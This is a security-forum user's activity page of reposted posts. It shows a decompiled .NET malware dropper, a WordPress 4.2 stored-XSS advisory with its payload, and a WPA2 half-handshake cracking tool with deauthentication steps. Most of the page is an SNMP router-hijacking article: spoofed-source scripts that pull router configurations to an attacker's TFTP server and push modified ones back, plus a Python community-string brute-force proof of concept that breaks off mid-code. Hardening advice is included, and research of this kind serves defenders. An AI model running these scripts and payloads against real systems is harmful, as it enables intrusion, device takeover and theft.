Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18715

  • Joined

  • Last visited

  • Days Won

    701

 Content Type 

Everything posted by Nytro

  1. Nytro
    E relativ. Opcode-ul "eb 17" == "sari 0x17 bytes" 8048062 (adresa urmatoare) + 0x17 == 8048079 E ciudat ca e "jmp 8048079" si nu "jmp 08048078" pentru ca la "08048078" se afla acel call care pune pe stack "/bin/sh". A, pula. Daca te uiti in shellcode-ul din programul C: \xeb\x16\x5e\x31 Este "eb 16" adica "jmp 08048078".
  2. Nytro
    Probabil iti plac femeile din Coreea sau Japonia, nu China.
  3. Nytro
    Malware. Copiaza un rahat (prost bindat, non-encrypted) in AppData. Dracia e scrisa in .NET si se vede usor: [COLOR=#1000a0]public[/COLOR] [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://mscorlib:2.0.0.0:b77a5c561934e089/System.Object"]object[/URL] [B][URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://WinApp:1.0.0.0/WinApp.Form1/Xtraer():Object"]Xtraer[/URL][/B]() { [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://mscorlib:2.0.0.0:b77a5c561934e089/System.Object"]object[/URL] [B]obj2[/B]; [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://mscorlib:2.0.0.0:b77a5c561934e089/System.Int32"]int[/URL] [B]num2[/B]; [COLOR=#1000a0]try[/COLOR] { [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://mscorlib:2.0.0.0:b77a5c561934e089/System.Int32"]int[/URL] [B]num3[/B]; [B]Label_0001[/B]: [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.CompilerServices.ProjectData"]ProjectData[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.CompilerServices.ProjectData/ClearProjectError()"]ClearProjectError[/URL](); [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://mscorlib:2.0.0.0:b77a5c561934e089/System.Int32"]int[/URL] [B]num[/B] = [COLOR=#800000]-2[/COLOR]; [B]Label_0009[/B]: num3 = [COLOR=#800000]2[/COLOR]; [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem"]FileSystem[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem/FileOpen(Int32,String,Microsoft.VisualBasic.OpenMode,Microsoft.VisualBasic.OpenAccess,Microsoft.VisualBasic.OpenShare,Int32)"]FileOpen[/URL]([COLOR=#800000]1[/COLOR], [COLOR=#1000a0]this[/COLOR].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://WinApp:1.0.0.0/WinApp.Form1/Ruta1:String"]Ruta1[/URL] + [COLOR=#800000]@"\ndwkdwmm.exe"[/COLOR], [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenMode"]OpenMode[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenMode/Binary"]Binary[/URL], [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenAccess"]OpenAccess[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenAccess/ReadWrite"]ReadWrite[/URL], [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenShare"]OpenShare[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenShare/Shared"]Shared[/URL], [COLOR=#800000]-1[/COLOR]); [B]Label_0028[/B]: num3 = [COLOR=#800000]3[/COLOR]; [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem"]FileSystem[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem/FilePut(Int32,String,Int64,Boolean)"]FilePut[/URL]([COLOR=#800000]1[/COLOR], [COLOR=#1000a0]this[/COLOR].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://WinApp:1.0.0.0/WinApp.Form1/Dat:String%5b%5d"]Dat[/URL][[COLOR=#800000]1[/COLOR]], [COLOR=#800000]-1[/COLOR][COLOR=#800000]L[/COLOR], [COLOR=#800000]false[/COLOR]); [B]Label_003D[/B]: num3 = [COLOR=#800000]4[/COLOR]; [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem"]FileSystem[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem/FileClose(Int32%5b%5d)"]FileClose[/URL]([COLOR=#1000a0]new[/COLOR] [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://mscorlib:2.0.0.0:b77a5c561934e089/System.Int32"]int[/URL][] { [COLOR=#800000]1[/COLOR] }); [B]Label_0052[/B]: num3 = [COLOR=#800000]5[/COLOR]; [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.Interaction"]Interaction[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.Interaction/Shell(String,Microsoft.VisualBasic.AppWinStyle,Boolean,Int32):Int32"]Shell[/URL]([COLOR=#1000a0]this[/COLOR].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://WinApp:1.0.0.0/WinApp.Form1/Ruta1:String"]Ruta1[/URL] + [COLOR=#800000]@"\ndwkdwmm.exe"[/COLOR], [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.AppWinStyle"]AppWinStyle[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.AppWinStyle/NormalFocus"]NormalFocus[/URL], [COLOR=#800000]false[/COLOR], [COLOR=#800000]-1[/COLOR]); [B]Label_006E[/B]: num3 = [COLOR=#800000]6[/COLOR]; [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem"]FileSystem[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem/FileOpen(Int32,String,Microsoft.VisualBasic.OpenMode,Microsoft.VisualBasic.OpenAccess,Microsoft.VisualBasic.OpenShare,Int32)"]FileOpen[/URL]([COLOR=#800000]2[/COLOR], [COLOR=#1000a0]this[/COLOR].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://WinApp:1.0.0.0/WinApp.Form1/Ruta2:String"]Ruta2[/URL] + [COLOR=#800000]@"\lklslslowlsloloaolsl.exe"[/COLOR], [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenMode"]OpenMode[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenMode/Binary"]Binary[/URL], [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenAccess"]OpenAccess[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenAccess/ReadWrite"]ReadWrite[/URL], [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenShare"]OpenShare[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.OpenShare/Shared"]Shared[/URL], [COLOR=#800000]-1[/COLOR]); [B]Label_008D[/B]: num3 = [COLOR=#800000]7[/COLOR]; [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem"]FileSystem[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem/FilePut(Int32,String,Int64,Boolean)"]FilePut[/URL]([COLOR=#800000]2[/COLOR], [COLOR=#1000a0]this[/COLOR].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://WinApp:1.0.0.0/WinApp.Form1/Dat:String%5b%5d"]Dat[/URL][[COLOR=#800000]2[/COLOR]], [COLOR=#800000]-1[/COLOR][COLOR=#800000]L[/COLOR], [COLOR=#800000]false[/COLOR]); [B]Label_00A2[/B]: num3 = [COLOR=#800000]8[/COLOR]; [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem"]FileSystem[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.FileSystem/FileClose(Int32%5b%5d)"]FileClose[/URL]([COLOR=#1000a0]new[/COLOR] [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://mscorlib:2.0.0.0:b77a5c561934e089/System.Int32"]int[/URL][] { [COLOR=#800000]2[/COLOR] }); [B]Label_00B7[/B]: num3 = [COLOR=#800000]9[/COLOR]; [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.Interaction"]Interaction[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.Interaction/Shell(String,Microsoft.VisualBasic.AppWinStyle,Boolean,Int32):Int32"]Shell[/URL]([COLOR=#1000a0]this[/COLOR].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://WinApp:1.0.0.0/WinApp.Form1/Ruta2:String"]Ruta2[/URL] + [COLOR=#800000]@"\lklslslowlsloloaolsl.exe"[/COLOR], [URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.AppWinStyle"]AppWinStyle[/URL].[URL="http://127.0.0.1/roeder/dotnet/Default.aspx?Target=code://Microsoft.VisualBasic:8.0.0.0:b03f5f7f11d50a3a/Microsoft.VisualBasic.AppWinStyle/NormalFocus"]NormalFocus[/URL], [COLOR=#800000]false[/COLOR], [COLOR=#800000]-1[/COLOR]); Scan real: https://www.virustotal.com/ro/file/8c6ac3cac91fe069cf49888f81eecc11733b788cc8bb0eb4b40e96dc2460f108/analysis/1430732314/
  4. Nytro
    Dezactivati "Facebook platform" din setarile de la Facebook.
  5. Nytro
    WordPress 4.2 stored XSS From: Jouko Pynnonen <jouko () iki fi>Date: Mon, 27 Apr 2015 05:15:46 +0300 OVERVIEW ========== Current versions of WordPress are vulnerable to a stored XSS. An unauthenticated attacker can inject JavaScript in WordPress comments. The script is triggered when the comment is viewed. If triggered by a logged-in administrator, under default settings the attacker can leverage the vulnerability to execute arbitrary code on the server via the plugin and theme editors. Alternatively the attacker could change the administrator’s password, create new administrator accounts, or do whatever else the currently logged-in administrator can do on the target system. DETAILS ======== If the comment text is long enough, it will be truncated when inserted in the database. The MySQL TEXT type size limit is 64 kilobytes so the comment has to be quite long. The truncation results in malformed HTML generated on the page. The attacker can supply any attributes in the allowed HTML tags, in the same way as with the two other recently published stored XSS vulnerabilities affecting the WordPress core. The vulnerability bears a similarity to the one reported by Cedric Van Bockhaven in 2014 (patched this week, after 14 months). Instead of using an invalid UTF-8 character to truncate the comment, this time an excessively long comment text is used for the same effect. In these two cases the injected JavaScript apparently can't be triggered in the administrative Dashboard, so these exploits require getting around comment moderation e.g. by posting one harmless comment first. PROOF OF CONCEPT ================== Enter the following as a comment: <a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA [64 kb] ...'></a> This was tested on WordPress 4.2, 4.1.2, and 4.1.1, MySQL versions 5.1.53 and 5.5.41. SOLUTION ========= Disable comments (Dashboard, Settings/Discussion, select as restrictive options as possible). Do not approve any comments. CREDITS ======== The vulnerability was discovered by Jouko Pynnönen of Klikki Oy. An up-to-date version of this document: http://klikki.fi/adv/wordpress2.html -- Jouko Pynnönen <jouko () iki fi> Klikki Oy - http://klikki.fi - @klikkioy Sursa: Bugtraq: WordPress 4.2 stored XSS
  6. Nytro
    Forta
  7. Nytro
    Conventional WPA2 attacks work by listening for a handshake between client and Access Point. This full fourway handshake is then used in a dictonary attack. This tool is a Proof of Concept to show it is not necessary to have the Access Point present. A person can simply listen for WPA2 probes from any client withen range, and then throw up an Access Point with that SSID. Though the authentication will fail, there is enough information in the failed handshake to run a dictionary attack against the failed handshake. Install $ sudo python setup.py install Sample use $ python halfHandshake.py -r sampleHalfHandshake.cap -m 48d224f0d128 -s "no place like 127.0.0.1" -r Where to read input pcap file with half handshake (works with full handshakes too) -m AP mac address (From the 'fake' access point that was used during the capture) -s AP SSID -d (optional) Where to read dictionary from Capturing half handshakes To listen for device probes the aircrack suite can be used as follows sudo airmon-ng start wlan0 sudo airodump-ng mon0 You should begin to see device probes with BSSID set as (not associated) appearing at the bottom. If WPA2 SSIDs pop up for these probes, these devices can be targeted Setup a WPA2 wifi network with an SSID the same as the desired device probe. The passphrase can be anything In ubuntu this can be done here 3 Ways to Create Wifi Hotspot in Ubuntu 14.04 (Android Support) | UbuntuHandbook Capture traffic on this interface. In linux this can be achived with TCPdump sudo tcpdump -i wlan0 -s 65535 -w file.cap (optional) Deauthenticate clients from nearby WiFi networks to increase probes If there are not enough unassociated clients, the aircrack suite can be used to deauthenticate clients off nearby networks deauthentication [Aircrack-ng] Sursa: https://github.com/dxa4481/WPA2-HalfHandshake-Crack
  8. Nytro
    Contents 1. NtGlobalFlag ...................................................................................................................... 5 2. Heap flags ........................................................................................................................... 8 3. The Heap ............................................................................................................................. 15 4. Thread Local Storage ................................................................................................... 19 5. Anti-Step-Over ................................................................................................................ 25 6. Hardware ............................................................................................................................. 29 A. Hardware breakpoints ............................................................................................... 29 B. Instruction Counting ............................................................................................... 30 C. Interrupt 3 ................................................................................................................... 34 D. Interrupt 0x2d ............................................................................................................ 35 E. Interrupt 0x41 ............................................................................................................ 36 F. MOV SS .............................................................................................................................. 37 7. APIs ...................................................................................................................................... 38 A. Heap functions ............................................................................................................ 38 B. Handles ............................................................................................................................ 41 i. OpenProcess ............................................................................................................... 41 ii. CloseHandle ............................................................................................................. 44 iii. CreateFile ............................................................................................................. 48 iv. LoadLibrary ............................................................................................................. 53 v. ReadFile ...................................................................................................................... 55 C. Execution Timing ........................................................................................................ 57 D. Process-level............................................................................................................... 62 i. CheckRemoteDebuggerPresent .............................................................................. 62 ii. Parent Process ...................................................................................................... 63 iii. CreateToolhelp32Snapshot .............................................................................. 65 iv. DbgBreakPoint......................................................................................................... 79 v. DbgPrint ...................................................................................................................... 80 vi. DbgSetDebugFilterState ..................................................................................... 82 vii. IsDebuggerPresent.............................................................................................. 83 viii. NtQueryInformationProcess .......................................................................... 84 ix. OutputDebugString ................................................................................................ 88 x. RtlQueryProcessHeapInformation ..................................................................... 90 xi. NtQueryVirtualMemory ......................................................................................... 91 xii. RtlQueryProcessDebugInformation ............................................................... 92 xiii. SwitchToThread .................................................................................................. 94 xiv. Toolhelp32ReadProcessMemory........................................................................ 95 xv. UnhandledExceptionFilter ................................................................................ 97 xvi. VirtualProtect .................................................................................................... 98 E. System-level ............................................................................................................... 100 i. FindWindow ............................................................................................................... 100 ii. NtQueryObject....................................................................................................... 102 iii. NtQuerySystemInformation ............................................................................ 105 iv. Selectors ............................................................................................................... 115 F. User-interface .......................................................................................................... 118 i. BlockInput ............................................................................................................... 118 ii. FLD............................................................................................................................. 120 iii. NtSetInformationThread................................................................................. 121 iv. SuspendThread....................................................................................................... 122 v. SwitchDesktop ......................................................................................................... 123 G. Uncontrolled execution ......................................................................................... 124 i. CreateProcess ......................................................................................................... 125 ii. CreateThread ......................................................................................................... 130 iii. DebugActiveProcess ......................................................................................... 131 iv. Enum... .................................................................................................................... 134 v. GenerateConsoleCtrlEvent................................................................................. 134 vi. NtSetInformationProcess................................................................................. 136 vii. NtSetLdtEntries ................................................................................................ 137 viii. QueueUserAPC .................................................................................................... 138 ix. RaiseException .................................................................................................... 139 x. RtlProcessFlsData ................................................................................................ 141 xi. WriteProcessMemory............................................................................................ 142 xii. Intentional exceptions................................................................................. 143 H. Conclusion ................................................................................................................... 146 Download: http://pferrie.host22.com/papers/antidebug.pdf
  9. Nytro
    Hacking networks with SNMP Posted on April 21, 2015 by Torstein Summary Exploiting common misconfigurations in network systems allows an attacker to gather and use information to take over and control network devices. This can be done just as easily to core equipment as to Customer-Premises Equipment(CPE). A large scale attack will make it possible to hijack an entire Internet Service Provider(ISP) within a very short time. This demonstration will be done against a virtualized Cisco network, but the same techniques applies to other vendors like Juniper, HP, Linux and others. Virtualization To prevent doing any damage to real networks, I will use GNS3 with Cisco to emulate a basic WAN. As for the attacking computer, a virtual Kali Linux will be attached to the network. Attacker IP: 80.200.43.20 Cisco configuration example for SNMP and NTP: [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 [/TD] [TD=class: crayon-code]interface GigabitEthernet0/0 ip address 88.0.3.10 255.255.255.0 ! ip access-list standard management remark ### NTP ### permit 80.2.0.64 remark ### SNMP ### permit 80.2.0.33 ! snmp-server community _________ RW management ! line vty 0 4 access-class management in ! ntp server 80.2.0.64 [/TD] [/TR] [/TABLE] Discovering devices The initial scan plays an important role in discovering remote vulnerable devices. SNMP is configured with a access-lists will still indicate a open port by connecting to it. The access-list will of-course deny any type of requests you make to the device unless the packet comes from a allowed IP. One of the easiest way to discover what type of network device you are up against, is by running a ntp query. By configuring “ntp server x.x.x.x”, are we not only synchronizing the device to that time-server, but it also turns the device into a NTP server itself. This allows us to find some unwanted information like equipment type and Refid which is equal to the NTP server’s server, along with a possible target for NTP reflection attacks. Apply some common sense, whois lookups and brute DNS tools – it won’t take long before you know where the management serverpool is. Cisco devices vulnerable to CVE-2014-3309 also seem to be open for NTP queries like this. [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums]1 2 [/TD] [TD=class: crayon-code]ntp server 80.2.0.64 ntp access-group peer management [/TD] [/TR] [/TABLE] This can be avoided by configuring a access-list associated with NTP configuration, firewalling the device or Control Plane Policing. Hacking SNMP Blindfloded Spoofing UDP packets source address will bypass the SNMP access-list “management”, and by blasting away thousands of passwords/sec may find the SNMP community string. The question is, how do we know when we found the correct community string? By sending IP spoofed Object Identifiers (OID’s) to the SNMP Management Information Base (MIB), we are able to tell the router to execute a command IF our community string is accepted. Decided to do some performance testing on live equipment and a Cisco 881-k9 where only able to handle 40000 attacks/min due to poor CPU performance. Split a dictionary between 100 CPE’s like the 881-k9 and you will be able to test ~4mill passwords/min. So, how is this really done? [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums]1 2 3 4 5 6 7 8 9 10 11 [/TD] [TD=class: crayon-code]Spoof source IP: 80.2.0.64, Destination mr router: 88.0.3.10 Hello mr router. The secret is "public", please ping 80.200.43.20 - wrong secret, request dropped - Hello mr router. The secret is "private", please ping 80.200.43.20 - correct secret, request accepted - - sending ICMP packet to 80.200.43.20 as you asked for - Network sniffer detecting a ICMP packet from mr router(88.0.3.10) Correct secret was found for mr router between line(RTT+0.1sec) and line(current time) [/TD] [/TR] [/TABLE] We got the community – so how to get access? More spoofing! Send another batch of spoofed OID’s to the router, we are now able to tell the router to upload its configuration to a TFTP server. (I had some issues with TFTP in Kali, so I booted a Ubuntu machine running xinetd with the IP 80.200.43.21.) After analyzing the router configuration, we can make a few modifications like adding a new user and removing the management access-lists for VTY. Now we can upload the new configuration back to the router with similar OID’s asking the router to download a file from the TFTP server and import it to the running-config. How to protect your equipment 1. BCP 38/RFC 2827 Source-address filter your network, a router will stop any packets not matching the reverse route for the senders source address. BCP38 should be enabled at the edge of your network facing both customers and other Internet Service Providers. This does not only protect you and other against this type of attacks, but also UDP reflection DDoS attacks. Warning: A network with asymmetrical routing may experience issues with BCP38 2. SNMPv3 SNMP version 3 offers both username and password support. Spoofing SNMPv3 is way more difficult than SNMPv 1-2c and due to password and packet encryption, discovery handshake and message integrity checks. 3. Filtering Deny NTP and SNMP with Access Control Lists(ACL), Control Plane Policing (CoPP) or firewalls. 4. Testing Do a network scan on equipment before you deploy a new model to check for unwanted services and ports. Edit: after speaking with Cisco PSIRT, I was recommended the following materials to fortify and protect network devices. There won’t be any security advisory/CVE since UDP spoofing-attack is a known issue – even considering it’s a new attack vector. Cisco Guide to Harden Cisco IOS Device Team CYMRU – Secure IOS template Concept code Download config [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 [/TD] [TD=class: crayon-code]#!/bin/bash STRING=private IP=88.0.3.10 SOURCEIP=80.2.0.64 TFTP=80.200.43.21 FILENAME=running-config iptables -t nat -A POSTROUTING -p udp --dport 161 -j SNAT --to-source $SOURCEIP snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 6 snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.2.111 i 1 snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.3.111 i 4 snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.4.111 i 1 snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.5.111 a $TFTP snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.6.111 s $FILENAME snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 1 iptables -t nat -D POSTROUTING -p udp --dport 161 -j SNAT --to-source $SOURCEIP [/TD] [/TR] [/TABLE] Upload config [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 [/TD] [TD=class: crayon-code]#!/bin/bash STRING=private IP=88.0.3.10 SOURCEIP=80.2.0.64 TFTP=80.200.43.21 FILENAME=change-config iptables -t nat -A POSTROUTING -p udp --dport 161 -j SNAT --to-source $SOURCEIP snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 6 snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.2.111 i 1 snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.3.111 i 1 snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.4.111 i 4 snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.5.111 a $TFTP snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.6.111 s $FILENAME snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 1 iptables -t nat -D POSTROUTING -p udp --dport 161 -j SNAT --to-source $SOURCEIP [/TD] [/TR] [/TABLE] Blind Password cracking – POC [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 [/TD] [TD=class: crayon-code]#!/usr/bin/python import socket, sys, time from scapy.all import * from multiprocessing import Process, Array iptoping = '\x50\xc8\x2b\x14' # 80.200.43.20 in hex ipaddr = ['88.0.3.14','88.0.3.6','88.0.3.10'] # target routers spoofedserver = '80.2.0.64' # ntpq -c rv TARGET_CPE | grep refid # Need to be permitted by router's snmp ACL snmpfile = 'best-snmppasswords.txt' defaultdelay = 0.0011 rtt = 1 #ms delay to targets # check if loopback-interface with spoofed IP is up and running stest = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: stest.bind((spoofedserver, 0)) except: print "ifconfig lo:0 " + spoofedserver + " netmask 255.255.255.255 up" sys.exit() rtt = rtt/1000 defaultdelay = int(defaultdelay*1000000) def snmpscan(ip, delayhigh, stop, dictline, c, minline, maxline): # add delays and such f = open(snmpfile, 'r') s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) delay = delayhigh[c]/1000000.0 s.bind((spoofedserver, 500+c)) counter = 1 for community in f: if stop[c] == True: return if (minline[c] <= counter and maxline[c] >= counter) or maxline[c] == 0: community = community.rstrip() snmp = [] # packet length need to be included in SNMP. length = str("%0.2x" % (len(community))).decode('hex') splen = str("%0.2x" % (len(community)+42)).decode('hex') xplen = str("%0.2x" % (len(community)+49)).decode('hex') yplen = str("%0.2x" % (len(community)+45)).decode('hex') snmp.append('\x30' + splen + '\x02\x01\x00\x04' + length + community + '\xa3\x23\x02\x04\x1e\x4d\xa9\x90\x02\x01\x00\x02\x01\x00\x30' '\x15\x30\x13\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01' '\x01\x10\x82\x4d\x02\x01\x06') snmp.append('\x30' + splen + '\x02\x01\x00\x04' + length + community + '\xa3\x23\x02\x04\x1a\x91\xe1\x36\x02\x01\x00\x02\x01\x00\x30' '\x15\x30\x13\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01' '\x01\x10\x82\x4d\x02\x01\x05') snmp.append('\x30' + xplen + '\x02\x01\x00\x04' + length + community + '\xa3\x2a\x02\x04\x6e\xaf\x5b\x8c\x02\x01\x00\x02\x01\x00\x30' '\x1c\x30\x1a\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01' '\x01\x0f\x82\x4d\x04\x08\x61\x6e\x79\x5f\x6e\x61\x6d\x65') snmp.append('\x30' + splen + '\x02\x01\x00\x04' + length + community + '\xa3\x23\x02\x04\x66\x9c\x88\x99\x02\x01\x00\x02\x01\x00\x30' '\x15\x30\x13\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01' '\x01\x02\x82\x4d\x02\x01\x01') snmp.append('\x30' + yplen + '\x02\x01\x00\x04' + length + community + '\xa3\x26\x02\x04\x13\x3a\x66\x29\x02\x01\x00\x02\x01\x00\x30' '\x18\x30\x16\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01' '\x01\x03\x82\x4d\x04\x04' + iptoping) snmp.append('\x30' + splen + '\x02\x01\x00\x04' + length + community + '\xa3\x23\x02\x04\x21\x98\x9b\xcd\x02\x01\x00\x02\x01\x00\x30' '\x15\x30\x13\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01' '\x01\x04\x82\x4d\x02\x01\x01') # last hex = number of icmp packets snmp.append('\x30' + splen + '\x02\x01\x00\x04' + length + community + '\xa3\x23\x02\x04\x7c\xe9\x79\x42\x02\x01\x00\x02\x01\x00\x30' '\x15\x30\x13\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01' '\x01\x10\x82\x4d\x02\x01\x01') for payload in snmp: s.sendto(payload, (ip, 161)) dictline[c] = counter time.sleep(delay) if stop[c] == True: return counter += 1 f.close() stop[c] = True def reply(packet): try: if packet[iCMP]: pos = 